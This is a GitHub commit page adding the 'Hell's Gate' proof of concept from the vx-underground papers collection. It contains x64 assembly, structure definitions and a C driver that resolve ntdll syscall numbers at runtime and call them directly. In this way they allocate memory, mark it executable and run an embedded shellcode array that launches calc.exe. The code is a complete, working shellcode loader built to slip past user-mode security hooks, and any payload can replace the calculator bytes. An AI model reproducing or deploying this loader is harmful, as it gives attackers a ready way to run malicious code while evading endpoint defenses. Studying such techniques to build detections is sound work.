daniel/VXUG-Papers
1
0
Fork 0
mirror of https://github.com/vxunderground/VXUG-Papers.git synced 2026-06-15 07:19:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2020-10-11 00:53:07 -05:00
committed by GitHub
parent ad3ed5a13f
commit a6dbe47b59
24 changed files with 3744 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Hells Gate/Assembly Expansion/HELLSGATE.ASM
+262
View File
@@ -0,0 +1,262 @@
; @file HELLSGATE.ASM
; @data 07-08-2020
; @author Paul Laîné (@am0nsec)
; @version 1.0
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
; @details
; @link https://ntamonsec.blogspot.com/
; @copyright This project has been released under the GNU Public License v3 license.
include HELLSGATE.INC
_DATA segment
extern Shellcode: BYTE
extern ShellcodeLength: QWORD
wSystemCall DWORD 000h
lpAddress QWORD ?
sDataSize QWORD ?
OldProtect QWORD ?
hThreadHandle QWORD ?
VXTable VX_TABLE <>
Timeout LARGE_INTEGER <>
_DATA ends
_TEXT segment
SystemCall PROC
mov r10, rcx
syscall
ret
SystemCall ENDP
HellsGate PROC
_start:
mov r8, gs:[60h] ; Get process environment block (PEB)
cmp [r8].PEB.OSMajorVersion, 0Ah ;
jne _failure ; Jump if not Windows 10
; Get the base address of ntdll
mov r8, [r8].PEB.Ldr ;
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
mov r9, r8 ; Store for later use
; Get module export directory
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
jne _failure ;
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
add r8, rbx ;
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
jne _failure ;
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
add r8, rbx ;
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
jne _failure ;
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
mov r8, r9 ; ImageBase
add r8, rbx ; Module + RVA
; Push function hashes
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
xor r15, r15 ; Clean R15 register
mov r15b, 4h ; Move to R15 number of functions to find
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
mov r12, r9 ; Function name RVA
add r12, rbx ; ImageBase + RVA
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
mov r13, r9 ;
add r13, rbx ;
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
mov r14, r9 ;
add r14, rbx ;
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
dec ecx
;-----------------------------------------------------------------------------
; Find function ordinal index w/ function name hash
;-----------------------------------------------------------------------------
_parse_functions_name:
mov rbx, 4h ; sizeof(DWORD)
imul rbx, rcx ; siezof(DWORD) * RCX
mov esi, [r12 + rbx] ; Function RVA
add rsi, r9 ; Function RVA + ImageBase
mov r10d, 5381h ; hash = 0x5381
_djb2:
mov r11d, r10d ; Store original hash value for later
shl r10d, 5 ; hash << 5
add r10d, r11d ; (hash << 5) + hash
xor r11d, r11d ; Clean temporary hash value
mov r11b, byte ptr [rsi] ; Get ASCII char
add r10d, r11d ; ((hash << 5) + hash) + char
inc rsi ; Next string char
cmp byte ptr [rsi], 00h ; End of string
jne _djb2 ;
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
jz _get_function_address ;
loop _parse_functions_name ;
;-----------------------------------------------------------------------------
; Find the function address w/ function ordinal
;-----------------------------------------------------------------------------
_get_function_address:
mov rax, 2h ; sizeof(WORD)
imul rax, rcx ; sizeof(WORD) * RCX
mov ax, [r14 + rax] ; AX = function ordinal
imul rax, 4 ; sizeof(DWORD) * ordinal
mov eax, [r13 + rax] ; RVA of function
mov rbx, r9 ; RBX = ImageBase
add rbx, rax ; RBX = address of function
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
;-----------------------------------------------------------------------------
; Find the function system call w/ function address
;-----------------------------------------------------------------------------
_get_function_syscall:
inc rbx
cmp byte ptr [rbx], 00C3h ; Check if RET
je _failure ;
cmp word ptr [rbx], 050Fh ; Check if syscall
jne _get_function_syscall ;
sub rbx, 0Eh ; Address of system call
mov cx, word ptr [rbx] ; CX = system call
lea rax, VXTable ; Address of VX table
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
_reset_loop:
; Move to the next function
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
dec ecx ;
dec r15 ; Check if all function have been found
jnz _parse_functions_name ;
;-----------------------------------------------------------------------------
; Execute the payload
;-----------------------------------------------------------------------------
_payload:
; Initialise variables
mov r10, ShellcodeLength ;
mov sDataSize, r10 ; Store shellcode length
mov lpAddress, 0h ;
; Execute NtAllocateVirtualMemory
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
lea rdx, lpAddress ; BaseAddress
xor r8, r8 ; ZeroBits
lea r9, sDataSize ; RegionSize
mov qword ptr [rsp + 20h], 3000h ; AllocationType
mov qword ptr [rsp + 28h], 4 ; Protect
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Copy shellcode
cld ; Clear direction flag == forward copy
lea rsi, Shellcode ; Origin
mov rdi, lpAddress ; Destination
mov rcx, ShellcodeLength ; Size of shellcode
rep movsb ; Copy byte until RCX = 0
; Execute NtProtectVirtualMemory
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
lea rdx, lpAddress ; BaseAddress
lea r8, sDataSize ; NumberOfBytesToProtect
mov r9d, 20h ; NewAccessProtection
mov OldProtect, 00h ;
lea r11, OldProtect ;
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Execute NtCreateThreadEx
mov ax, VXTable.NtCreateThreadEx.wSystemCall
mov hThreadHandle, 0 ;
lea rcx, hThreadHandle ; hThread
mov rdx, 1FFFFFh ; DesiredAccess
xor r8, r8 ; ObjectAttributes
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
mov r10, lpAddress ;
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
mov qword ptr [rsp + 28h], 00h ; lpParameter
mov qword ptr [rsp + 30h], 00h ; Flags
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
; Execute NtWaitForSingleObject
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
mov rcx, hThreadHandle ; ObjectHandle
xor rdx, rdx ; Alertable
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
lea r8, Timeout ;
call SystemCall ;
cmp eax, 00h ; (NTSTATUS != 0)
jne _failure ;
;-----------------------------------------------------------------------------
; Successfully execution of the function
;-----------------------------------------------------------------------------
_success:
mov rax, 1
ret
;-----------------------------------------------------------------------------
; In case something goes wrong
;-----------------------------------------------------------------------------
_failure:
xor rax, rax
ret
HellsGate ENDP
_TEXT ends
; end of file
end
Hells Gate/Assembly Expansion/HELLSGATE.INC
+285
View File
@@ -0,0 +1,285 @@
; @file HELLSGATE.INC
; @data 07-08-2020
; @author Paul Laîné (@am0nsec)
; @version 1.0
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
; @details
; @link https://ntamonsec.blogspot.com/
; @copyright This project has been released under the GNU Public License v3 license.
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
VXTableSize EQU SIZEOF VX_TABLE
VX_TABLE_ENTRY struct
pAddress QWORD ? ; 0x0000
dwHash DWORD ? ; 0x0008
wSystemCall WORD ? ; 0x000C
BYTE 2 dup(?) ; padding
VX_TABLE_ENTRY ends
VX_TABLE struct
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
VX_TABLE ends
LARGE_INTEGER struct
LowPart DWORD ? ; 0x0000
HighPart DWORD ? ; 0x0004
LARGE_INTEGER ends
ULARGE_INTEGER struct
LowPart DWORD ? ; 0x0000
HighPart DWORD ? ; 0x0004
ULARGE_INTEGER ends
UNICODE_STRING struct
_Length WORD ? ; 0x0000
MaximumLength WORD ? ; 0x0002
BYTE 4 dup(?) ; padding
Buffer QWORD ? ; 0x0008
UNICODE_STRING ends
LIST_ENTRY struct
Flink QWORD ? ; 0x0000
BLink QWORD ? ; 0x0008
LIST_ENTRY ends
PEB struct
InheritedAddressSpace BYTE ? ; 0x0000
ReadImageFileExecOptions BYTE ? ; 0x0001
BeingDebugged BYTE ? ; 0x0002
BitField BYTE ? ; 0x0003
Padding0 BYTE 4 dup(?) ; 0x0004
Mutant QWORD ? ; 0x0008
ImageBaseAddress QWORD ? ; 0x0010
Ldr QWORD ? ; 0x0018
ProcessParameters QWORD ? ; 0x0020
SubSystemData QWORD ? ; 0x0028
ProcessHeap QWORD ? ; 0x0030
FastPebLock QWORD ? ; 0x0038
AtlThunkSListPtr QWORD ? ; 0x0040
IFEOKey QWORD ? ; 0x0048
CrossProcessFlags DWORD ? ; 0x0050
Padding1 BYTE 4 dup(?) ; 0x0054
UserSharedInfoPtr QWORD ? ; 0x0058
SystemReserved DWORD ? ; 0x0060
AtlThunkSListPtr32 DWORD ? ; 0x0064
ApiSetMap QWORD ? ; 0x0068
TlsExpansionCounter DWORD ? ; 0x0070
Padding2 BYTE 4 dup(?) ; 0x0074
TlsBitmap QWORD ? ; 0x0078
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
SharedData QWORD ? ; 0x0090
ReadOnlyStaticServerData QWORD ? ; 0x0098
AnsiCodePageData QWORD ? ; 0x00A0
OemCodePageData QWORD ? ; 0x00A8
UnicodeCaseTableData QWORD ? ; 0x00B0
NumberOfProcessors DWORD ? ; 0x00B9
NtGlobalFlag DWORD ? ; 0x00BC
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
HeapSegmentReserve QWORD ? ; 0x00C8
HeapSegmentCommit QWORD ? ; 0x00D0
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
NumberOfHeaps DWORD ? ; 0x00E8
MaximumNumberOfHeaps DWORD ? ; 0x00EC
ProcessHeaps QWORD ? ; 0x00F0
GdiSharedHandleTable QWORD ? ; 0x00F8
ProcessStarterHelper QWORD ? ; 0x0100
GdiDCAttributeList DWORD ? ; 0x0108
Padding3 BYTE 4 dup(?) ; 0x010C
LoaderLock QWORD ? ; 0x0110
OSMajorVersion DWORD ? ; 0x0118
OSMinorVersion DWORD ? ; 0x011C
OSBuildNumber WORD ? ; 0x0120
OSCSDVersion WORD ? ; 0x0122
OSPlatformId DWORD ? ; 0x0124
ImageSubsystem DWORD ? ; 0x0128
ImageSubsystemMajorVersion DWORD ? ; 0x012C
ImageSubsystemMinorVersion DWORD ? ; 0x0130
Padding4 BYTE 4 dup(?) ; 0x0134
ActiveProcessAffinityMask QWORD ? ; 0x0138
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
PostProcessInitRoutine QWORD ? ; 0x0230
TlsExpansionBitmap QWORD ? ; 0x0238
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
SessionId DWORD ? ; 0x02C0
Padding5 BYTE 4 dup(?) ; 0x02C4
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
pShimData QWORD ? ; 0x02D8
AppCompatInfo QWORD ? ; 0x02E0
CSDVersion UNICODE_STRING <> ; 0x02E8
ActivationContextData QWORD ? ; 0x02F8
ProcessAssemblyStorageMap QWORD ? ; 0x0300
SystemDefaultActivationContextData QWORD ? ; 0x0308
SystemAssemblyStorageMap QWORD ? ; 0x0310
MinimumStackCommit QWORD ? ; 0x0318
SparePointers QWORD 4 dup(?) ; 0x0320
SpareUlongs DWORD 5 dup(?) ; 0x0340
BYTE 4 dup(?)
WerRegistrationData QWORD ? ; 0x0358
WerShipAssertPtr QWORD ? ; 0x0360
pUnused QWORD ? ; 0x0368
pImageHeaderHash QWORD ? ; 0x0370
TracingFlags DWORD ? ; 0x0378
Padding6 BYTE 4 dup(?) ; 0x037c
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
TppWorkerpListLock QWORD ? ; 0x0388
TppWorkerpList LIST_ENTRY <> ; 0x0390
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
TelemetryCoverageHeader QWORD ? ; 0x07A0
CloudFileFlags DWORD ? ; 0x07A8
CloudFileDiagFlags DWORD ? ; 0x07AC
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
LeapSecondData QWORD ? ; 0x07B8
LeapSecondFlags DWORD ? ; 0x07c0
NtGlobalFlag2 DWORD ? ; 0x07c4
PEB ends
PEB_LDR_DATA struct
_Length DWORD ? ; 0x0000
Initialized BYTE ? ; 0x0004
BYTE 3 dup(?) ; padding
SsHandle QWORD ? ; 0x0008
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
EntryInProgress QWORD ? ; 0x0040
ShutdownInProgress BYTE ? ; 0x0048
BYTE 7 dup(?) ; padding
ShutdownThreadId QWORD ? ; 0x0050
PEB_LDR_DATA ends
RTL_BALANCED_NODE struct
_Dummy BYTE 24 dup(?)
RTL_BALANCED_NODE ends
LDR_DATA_TABLE_ENTRY struct
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
DllBase QWORD ? ; 0x0030
EntryPoint QWORD ? ; 0x0038
SizeOfImage DWORD ? ; 0x0040
BYTE 4 dup(?) ; padding
FullDllName UNICODE_STRING <> ; 0x0048
BaseDllName UNICODE_STRING <> ; 0x0058
FlagGroup BYTE 4 dup(?) ; 0x0068
ObsoleteLoadCount WORD ? ; 0x006C
TlsIndex WORD ? ; 0x006E
HashLinks LIST_ENTRY <> ; 0x0070
TimeDateStamp DWORD ? ; 0x0080
BYTE 4 dup(?) ; padding
EntryPointActivationContext QWORD ? ; 0x0088
_Lock QWORD ? ; 0x0090
DdagNode QWORD ? ; 0x0098
NodeModuleLink LIST_ENTRY <> ; 0x00A0
LoadContext QWORD ? ; 0x00B0
ParentDllBase QWORD ? ; 0x00B8
SwitchBackContext QWORD ? ; 0x00C0
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
OriginalBase QWORD ? ; 0x00F8
LoadTime LARGE_INTEGER <> ; 0x0100
BaseNameHashValue DWORD ? ; 0x0108
LoadReason DWORD ? ; 0x010C
ImplicitPathOptions DWORD ? ; 0x0110
ReferenceCount DWORD ? ; 0x0114
DependentLoadFlags DWORD ? ; 0x0118
SigningLevel BYTE ? ; 0x011C
LDR_DATA_TABLE_ENTRY ends
IMAGE_DOS_HEADER struct
e_magic WORD ? ; 0x0000
e_cblp WORD ? ; 0x0002
e_cp WORD ? ; 0x0004
e_crlc WORD ? ; 0x0006
e_cparhdr WORD ? ; 0x0008
e_minalloc WORD ? ; 0x000A
e_maxalloc WORD ? ; 0x000C
e_ss WORD ? ; 0x000E
e_sp WORD ? ; 0x0010
e_csum WORD ? ; 0x0012
e_ip WORD ? ; 0x0014
e_cs WORD ? ; 0x0016
e_lfarlc WORD ? ; 0x0018
e_ovno WORD ? ; 0x001A
e_res WORD 4 dup(?) ; 0x001C
e_oemid WORD ? ; 0x0024
e_oeminfo WORD ? ; 0x0026
e_res2 WORD 10 dup(?) ; 0x0028
e_lfanew DWORD ? ; 0x003C
IMAGE_DOS_HEADER ends
IMAGE_FILE_HEADER struct
Machine WORD ? ; 0x0000
NumberOfSections WORD ? ; 0x0002
TimeDateStamp DWORD ? ; 0x0004
PointerToSymbolTable DWORD ? ; 0x0008
NumberOfSymbols DWORD ? ; 0x000c
SizeOfOptionalHeader WORD ? ; 0x0010
Characteristics WORD ? ; 0x0012
IMAGE_FILE_HEADER ends
IMAGE_DATA_DIRECTORY struct
VirtualAddress DWORD ? ; 0x0000
_Size DWORD ? ; 0x0004
IMAGE_DATA_DIRECTORY ends
IMAGE_OPTIONAL_HEADER64 struct
Magic WORD ? ; 0x0000
MajorLinkerVersion BYTE ? ; 0x0002
MinorLinkerVersion BYTE ? ; 0x0003
SizeOfCode DWORD ? ; 0x0004
SizeOfInitializedData DWORD ? ; 0x0008
SizeOfUninitializedData DWORD ? ; 0x000C
AddressOfEntryPoint DWORD ? ; 0x0010
BaseOfCode DWORD ? ; 0x0014
ImageBase QWORD ? ; 0x0018
SectionAlignment DWORD ? ; 0x0020
FileAlignment DWORD ? ; 0x0024
MajorOperatingSystemVersion WORD ? ; 0x0028
MinorOperatingSystemVersion WORD ? ; 0x002a
MajorImageVersion WORD ? ; 0x002C
MinorImageVersion WORD ? ; 0x002E
MajorSubsystemVersion WORD ? ; 0x0030
MinorSubsystemVersion WORD ? ; 0x0032
Win32VersionValue DWORD ? ; 0x0034
SizeOfImage DWORD ? ; 0x0038
SizeOfHeaders DWORD ? ; 0x003c
CheckSum DWORD ? ; 0x0040
Subsystem WORD ? ; 0x0044
DllCharacteristics WORD ? ; 0x0046
SizeOfStackReserve QWORD ? ; 0x0048
SizeOfStackCommit QWORD ? ; 0x0050
SizeOfHeapReserve QWORD ? ; 0x0058
SizeOfHeapCommit QWORD ? ; 0x0060
LoaderFlags DWORD ? ; 0x0068
NumberOfRvaAndSizes DWORD ? ; 0x006C
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
IMAGE_OPTIONAL_HEADER64 ends
IMAGE_NT_HEADERS64 struct
Signature DWORD ? ; 0x0000
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
IMAGE_NT_HEADERS64 ends
IMAGE_EXPORT_DIRECTORY struct
Characteristics DWORD ? ; 0x0000
TimeDateStamp DWORD ? ; 0x0004
MajorVersion WORD ? ; 0x0008
MinorVersion WORD ? ; 0x000A
_Name DWORD ? ; 0x000C
Base DWORD ? ; 0x0010
NumberOfFunctions DWORD ? ; 0x0014
NumberOfNames DWORD ? ; 0x0018
AddressOfFunctions DWORD ? ; 0x001C
AddressOfNames DWORD ? ; 0x0020
AddressOfNameOrdinals DWORD ? ; 0x0024
IMAGE_EXPORT_DIRECTORY ends
Hells Gate/Assembly Expansion/main.c
+42
View File
@@ -0,0 +1,42 @@
/**
* @file main.c
* @data 07-08-2020
* @author Paul Laîné(@am0nsec)
* @version 1.0
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
* @details
* @link https ://ntamonsec.blogspot.com/
* @copyright This project has been released under the GNU Public License v3 license.
*/
#include <Windows.h>
unsigned char Shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
DWORD ShellcodeLength = sizeof(Shellcode);
extern BOOL HellsGate(void);
INT wmain() {
BOOL a = HellsGate();
}